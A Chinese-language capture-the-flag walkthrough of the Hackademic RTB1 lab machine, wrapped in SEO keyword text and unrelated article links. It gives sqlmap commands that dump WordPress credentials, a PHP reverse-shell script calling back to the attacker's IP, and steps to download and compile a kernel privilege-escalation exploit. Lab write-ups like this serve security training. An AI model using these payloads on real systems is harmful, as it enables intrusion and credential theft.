当前位置: 首页 > news >正文

网站可以做推广百度开放平台

网站可以做推广,百度开放平台,建设网站的公司有哪些,广东省公路建设公司官方网站靶机介绍 官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/ 需要读取靶机的root目录下key.txt 运行环境: 虚拟机网络设置的是NAT模式 靶机:IP地址:192.168.233.131 攻击机:kali linux,IP地…

靶机介绍
官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/
在这里插入图片描述
需要读取靶机的root目录下key.txt
运行环境:
虚拟机网络设置的是NAT模式
靶机:IP地址:192.168.233.131
攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

image-20230703153927729

进入靶机

image​​

用wappalyzer查看用到技术

image

查看开放的端口

image-20230703173946936

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

image-20230703192555811

image-20230703192845503

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

image-20230703194526935

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

image-20230703202147050

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

image-20230703202222352

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

image-20230703202309068

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

image-20230703202333804

GeorgeMiller、q1w2e3登录

image-20230703203518703

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

image-20230703203557858

image-20230703204739867

kali打开监听

image-20230703204343618

运行反弹shell

image-20230703204715657

反弹shell成功

image-20230703204816477

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

image-20230703210505136​搜索内核漏洞

searchsploit 2.6.31

image-20230703210917302

下载到本地searchsploit -m 15285.c

image-20230703211758478​kali开启web服务器

image-20230703212054869

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

image-20230703212607768

编译脚本

gcc 15285.c -o exp

image-20230703213015682

将编译的exp赋予执行权限并执行exp

image-20230703213406686

提权成功id为0

image-20230703213620621

http://www.yayakq.cn/news/626138/

相关文章:

  • 基于p2p的网站建设tp5做企业类网站
  • 培训机构网站模板seo优化师培训
  • 做静态页面的网站怎么样搭建wordpress
  • 搞一个网站多少钱餐饮公司介绍模板
  • 做查询快递单号的网站多少钱网页布局类型
  • c 做商务网站方便吗天眼查官方网站
  • 温州合作网站网站挂马黑链检测清除工具
  • 秦皇岛建设工程信息网站销售培训课程一般有哪些
  • 如何用社交网站开发客户南宁网红
  • 微信开发网站开发未来前景咨询聊城做网站
  • 制作网站需要哪些成本wordpress怎么static
  • 网站无法链接看WordPress用哪个页面
  • 东营机关建设网站住房和城乡建设部网站造价
  • 网站被挂了黑链如何创建自己的商城
  • 免费摄影网站做网站怎么注册营业执照
  • 什么站做咨询网站好wordpress注册密码忘记
  • 国内如何做国外网站的兼职项目十大经典口碑营销案例
  • 定制网站开发价格长沙人才招聘网长沙58同城招聘网
  • 网站建设都需要那些材料福州网站快速排名
  • 个人业务网站源码php西安做网站哪家便宜
  • 东莞网站公司推广技巧深圳宝安天气
  • 哪里建网站好去西安旅游最佳路线
  • 公司网站建设怎么入账登录网址
  • 在线网站流量查询DW做注册网站
  • 怎么做网站下载链接设计传媒公司logo
  • wordpress弹窗广告帝国网站seo
  • 邢台地区网站建设口碑好网页设计html代码大全居中
  • 关键词库在网站上怎么体现优化网络工程师
  • vs做网站各种控件的使用网站推广关键词
  • 网站建设新闻如何更新怎么建设网站上传音乐